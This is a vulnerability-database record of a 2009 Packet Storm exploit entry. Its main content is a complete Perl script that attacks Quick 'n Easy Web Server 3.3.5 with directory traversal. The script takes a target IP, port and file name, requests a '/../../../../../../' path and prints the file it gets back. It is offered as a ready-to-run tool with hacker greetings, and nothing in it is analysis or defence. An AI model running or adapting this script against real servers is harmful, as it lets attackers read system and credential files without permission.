{"id": "PACKETSTORM:77101", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Quick N Easy 3.3.5 File Disclosure", "description": "", "published": "2009-04-29T00:00:00", "modified": "2009-04-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/77101/Quick-N-Easy-3.3.5-File-Disclosure.html", "reporter": "Cyber-Zone", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:30", "viewCount": 8, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/77101/quickeasy-disclose.txt", "sourceData": "`#!/usr/bin/perl -w \n# \n# Found By : Cyber-Zone (ABDELKHALEK) \n# Paradis_des_fous@hotmail.fr \n# \n# \n# Note : Don't use this for your own R!sk :d \n# \n# \n# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers \n \n# \n# demo version Tested under my MS WINDOWS sp2 \n# \n# download : http://www.softpedia.com/progDownload/Quick-n-Easy-Web-Server-Download-45387.html \n# Screenshot : http://www.exploiter5.com/blog/directory-traversal.png \n# \nuse LWP::Simple; \nuse LWP::UserAgent; \n \nprint \"\\tQuick 'n Easy Web Server 3.3.5 Arbitrary File Disclosure Exploit\\n\"; \n \nprint \"\\t****************************************************************\\n\"; \nprint \"\\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\\n\"; \nprint \"\\t* E-mail : Paradis_des_fous[at]hotmail.fr *\\n\"; \nprint \"\\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\\n\"; \nprint \"\\t* From : MoroccO Figuig/Oujda City *\\n\"; \nprint \"\\t****************************************************************\\n\\n\\n\\n\"; \n \nif(@ARGV < 4) \n{ \n&help; exit(); \n} \nsub help() \n{ \nprint \"[X] Usage : perl $0 HackerName IP Port File\\n\"; \nprint \"[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini\\n\"; \n} \n($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV; \nprint(\"Please Wait ! Connecting To The Server ......\\n\\n\"); \nsleep(5); \n \nprint(\" ******************************\\n\"); \nprint(\" * Status *\\n\"); \nprint(\" ******************************\\n\"); \nprint(\"Loading ........................................\\n\\n\\n\"); \n \n$temp=\"/../../../../../../\"; \nmy $boom = \"http://\" . $TargetIP . \":\" . $AttackedPort . $temp . $TargetFile; \nprint(\"Exploiting .....> |80\\n\"); \nsleep(15); \nprint(\"Exploiting ..........|Done!\\n\"); \nsleep(5); \n$Disclosure=get $boom; \nif($Disclosure){ \nprint(\"\\n\\n\\n\\n............File Contents Are Just Below...........\\n\"); \nprint(\"$Disclosure \\n\"); \nprint(\".........................EOF.......................\\n\"); \nprint(\"Done For Fun //Figuigian HaCker\\n\"); \nprint(\"Some Womens Makes The World Special , Just By Being On it <3\\n\"); \nprint(\"SEE U $HackerName\\n\\n\\n\"); \n} \nelse \n{ \nprint(\" Not Found !!!\\n\\n\"); \nexit; \n} \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646774744}}
{}